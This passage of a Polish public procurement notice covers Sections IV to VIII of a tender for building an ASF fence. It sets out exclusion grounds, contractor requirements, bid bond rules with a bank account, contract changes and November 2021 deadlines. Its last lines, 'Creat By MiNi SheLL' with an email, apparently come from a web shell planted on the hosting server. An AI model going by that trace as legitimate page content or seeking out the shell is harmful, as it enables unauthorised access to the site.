<h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O zamówienie publiczne mogą ubiegać się Wykonawcy spełniający warunki udziału w<br/>postępowaniu dotyczące:<br/>1) kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to<br/>z odrębnych przepisów.<br/>Zamawiający nie stawia szczegółowych wymagań w tym zakresie<br/>2) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczegółowych wymagań w tym zakresie<br/>3) zdolności technicznej lub zawodowej;<br/>Zamawiający wymaga:<br/>a) aby Wykonawca wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert a<br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej dwie roboty<br/>budowlane których wartość wynosiła co najmniej 200 000,00 PLN brutto każda.<br/>b) aby Wykonawca skierował do realizacji zamówienia publicznego osoby odpowiedzialne za kierowanie robotami budowlanymi, tj. minimum:<br/>- jedną osobę – Kierownika budowy - posiadającego uprawnienia budowlane do kierowania<br/>robotami budowlanymi w specjalności konstrukcyjno – budowlanej.<br/>Osoba powyższa musi posiadać niezbędne do wykonania zamówienia kwalifikacje zawodowe, tj.<br/>uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 roku – Prawo budowlane<br/>(Dz. U. z 2020 r., poz. 1333 z późn. zm. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Wypełniony formularz ofertowy (wzór – zał. nr 1)<br/>2)	Kosztorys szczegółowy z zestawieniami robocizny, materiałów i pracy sprzętu sporządzony na podstawie przedmiarów robót.<br/>3)	Odpis z właściwego rejestru działalności gospodarczej lub inny dokument potwierdzający dane firmy oraz dane osób uprawnionych do jej reprezentowania lub podanie numeru KRS albo CEIDG.<br/>4)	Pełnomocnictwo /oryginał/osoby lub osób podpisujących ofertę - jeżeli uprawnienie do podpisu nie wynika bezpośrednio z załączonych dokumentów,<br/>5)	W przypadku złożenia oferty wspólnej– pełnomocnictwo udzielone liderowi,<br/>6)	Zobowiązanie podmiotu trzeciego do udostępnienia zasobów (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w wysokości określonej poniżej dla Pakietów:<br/>dla Pakietu I ………………………..w wysokości 3.500,00 zł<br/>dla Pakietu II ……………………….w wysokości 2.500,00 zł<br/><br/>Wadium należy wnieść przed upływem terminu składania ofert. <br/><br/>2.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,<br/>3) gwarancjach bankowych,<br/>4) gwarancjach ubezpieczeniowych,<br/>5) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2020 r. poz. 299.).<br/><br/>3. Wadium wpłacane w pieniądzu należy wnieść przelewem na rachunek bankowy Zamawiającego w banku Bank Ochrony Środowiska S.A./O Tarnów nr rachunku: 26 1540 1203 2001 4288 5506 0001 z dopiskiem: wadium na zabezpieczenie oferty w postępowaniu na „Budowa ogrodzenia p/ASF – II postępowanie – pakiet nr ……”. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego.<br/><br/>4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 PZP.<br/><br/>5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 11.2. ppkt 2)-4) należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznymi osób upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę na daną część zamówienia przez cały okres związania ofertą. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP.<br/>6. Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie przedmiotu zamówienia<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP.<br/><br/>7.	Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z<br/>postępowania. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>warunki udziału w postępowaniu określone w pkt 1. powinni spełniać łącznie wszyscy<br/>Wykonawcy.<br/>4. W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać<br/>umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa<br/>załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić<br/>odpowiedzialność solidarną za wykonanie umowy;<br/>4) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie<br/>Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania<br/>poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>5) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w<br/>całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia łącznie lub każdego z osobna. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie istotne dla stron postanowienia zawiera wzór umowy stanowiący załącznik nr 7 do<br/>SIWZ. Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy.<br/>2. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści<br/>oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej<br/>jednej z okoliczności wymienionych poniżej z uwzględnieniem podawanych warunków ich<br/>wprowadzenia.<br/>3. Zmiana terminu realizacji przedmiotu umowy możliwa jest w przypadku:<br/>1.1. Zmiany spowodowane warunkami atmosferycznymi uniemożliwiającymi wykonywanie robót,<br/>w szczególności:<br/>a) klęski żywiołowe,<br/>b) utrzymujące się niskie temperatury i pokrywa śnieżna<br/>c) rozmiękczenie gruntu uniemożliwiające poruszanie się sprzętu<br/>1.2. Zmiany spowodowane warunkami geologicznymi, archeologicznymi lub terenowymi, w<br/>szczególności:<br/>a) niewypały i niewybuchy,<br/>b) wykopaliska archeologiczne nie przewidywane w SIWZ,<br/>1.3. Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w<br/>szczególności:<br/>a) wstrzymanie robót przez Zamawiającego,<br/>b) konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej.<br/>1.4. Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz wykonawcy skutkujące<br/>niemożliwością prowadzenia prac.<br/>1.5. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych powyżej termin<br/>wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia<br/>wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych<br/>okoliczności.<br/>2. Zmiana sposobu spełnienia świadczenia<br/>2.1. Zmiany technologiczne, w szczególności:<br/>a) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań<br/>technicznych/technologicznych niż wskazane w dokumentacji projektowej, w sytuacji, gdyby<br/>zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem<br/>projektu,<br/>b) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub<br/>materiałowych ze względu na zmiany obowiązującego prawa.<br/>Zmiany wskazywane w lit b) będą wprowadzane wyłącznie w zakresie umożliwiającym oddanie<br/>przedmiotu umowy do użytkowania, a Zamawiający może ponieść ryzyko zwiększenia<br/>wynagrodzenia z tytułu takich zmian wyłącznie w kwocie równej zwiększonym z tego powodu<br/>kosztom.<br/>2.2. Zmiany osobowe - zmiana osób, przy pomocy których Wykonawca realizuje przedmiot<br/>umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o<br/>których mowa w ustawie Prawo budowlane lub innych ustawach, a także SIWZ, będzie<br/>wymagała również zaakceptowania przez Zamawiającego.<br/>3. Pozostałe zmiany<br/>a. zmiana obowiązującej stawki VAT:<br/>b. rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający<br/>zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca<br/>poniósł w związku z wynikającymi z umowy planowanymi świadczeniami.<br/>c. Zamawiający dopuszcza wprowadzenie zmiany materiałów urządzeń przedstawionych w<br/>ofercie przetargowej, pod warunkiem że zmiany te będą korzystne dla zamawiającego. Będą to,<br/>przykładowo okoliczności:<br/>- powodujące obniżenie kosztu ponoszonego przez zamawiającego na eksploatację i<br/>konserwację wykonanego przedmiotu umowy,<br/>-powodujące poprawienie parametrów technicznych<br/>- wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany<br/>obowiązujących przepisów.<br/>Wszystkie powyższe postanowienia stanowią katalog zmian na które Zamawiający może<br/>wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy https://platformazakupowa.pl/pn/lasy_dabrowa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-15 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com